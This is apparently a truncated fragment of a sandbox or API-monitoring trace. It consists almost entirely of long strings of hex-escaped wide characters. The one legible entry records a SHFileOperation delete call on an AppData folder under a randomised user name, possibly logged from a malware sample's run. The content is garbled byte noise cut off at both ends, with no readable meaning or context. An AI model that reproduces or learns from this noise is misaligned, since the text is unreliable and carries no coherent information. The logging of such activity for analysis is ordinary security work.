x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\